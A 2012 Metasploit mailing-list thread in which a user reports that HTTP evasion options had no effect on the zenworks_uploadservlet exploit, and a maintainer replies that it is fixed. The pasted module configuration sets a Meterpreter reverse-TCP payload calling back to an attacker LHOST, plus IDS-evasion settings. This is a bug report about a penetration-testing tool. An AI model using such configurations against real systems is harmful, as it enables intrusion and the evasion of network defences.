Metasploit mailing list archives

Re: HTTP Evasions not working as intended

From: egypt () metasploit com
Date: Fri, 6 Jan 2012 20:19:12 -0700

Fixed in latest trunk, thanks for the report!

egypt

On Fri, Jan 6, 2012 at 3:11 AM, Ashish Joshi <joshi.ashish22 () gmail com> wrote:

Hi,



I am trying to use various HTTP evasions for some HTTP server based exploits
(say exploit/windows/http/zenworks_uploadservlet) or similar exploits. I am
making use of various evasions supported. However, when I run the exploit ,
I don’t see any difference b/w a normal exploitation and evasive
exploitation. I checked respective pcaps and they all look same. I have
tried using following evasions:



HTTP::method_random_case

HTTP::uri_fake_end

HTTP::pad_fake_headers





.. and couple more.



Here is my config:



msf  exploit(zenworks_uploadservlet) > set



Global

======



No entries in data store.



Module: windows/http/zenworks_uploadservlet

===========================================



  Name                          Value

  ----                          -----

  EnableUnicodeEncoding         true

  FingerprintCheck              false

  HTTP::header_folding          false

  HTTP::method_random_case      true

  HTTP::method_random_invalid   false

  HTTP::method_random_valid     false

  HTTP::pad_fake_headers        false

  HTTP::pad_fake_headers_count  0

  HTTP::pad_get_params          false

  HTTP::pad_get_params_count    16

  HTTP::pad_method_uri_count    1

  HTTP::pad_method_uri_type     space

  HTTP::pad_post_params         false

  HTTP::pad_post_params_count   16

  HTTP::pad_uri_version_count   1

  HTTP::pad_uri_version_type    space

  HTTP::uri_dir_fake_relative   false

  HTTP::uri_dir_self_reference  false

  HTTP::uri_encode_mode         hex-normal

  HTTP::uri_fake_end            true

  HTTP::uri_fake_params_start   false

  HTTP::uri_full_url            false

  HTTP::uri_use_backslashes     false

  InitialAutoRunScript

  LHOST                         10.204.136.1

  LPORT                         4444

  PAYLOAD                       java/meterpreter/reverse_tcp

  RHOST                         8.0.0.101

  RPORT                         80

 TARGET                        0

  UserAgent                     Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.1)

  VERBOSE                       false

  WfsDelay                      0







This doesn’t seems to be working. Is there any bug related to it. I checked
the bug-tracker and couldn’t find a relevant one.

How do I make it work. Any help would be appreciated.





Thanks,

 Ashish






_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

HTTP Evasions not working as intended Ashish Joshi (Jan 06)
- Re: HTTP Evasions not working as intended egypt (Jan 06)
- Re: HTTP Evasions not working as intended HD Moore (Jan 07)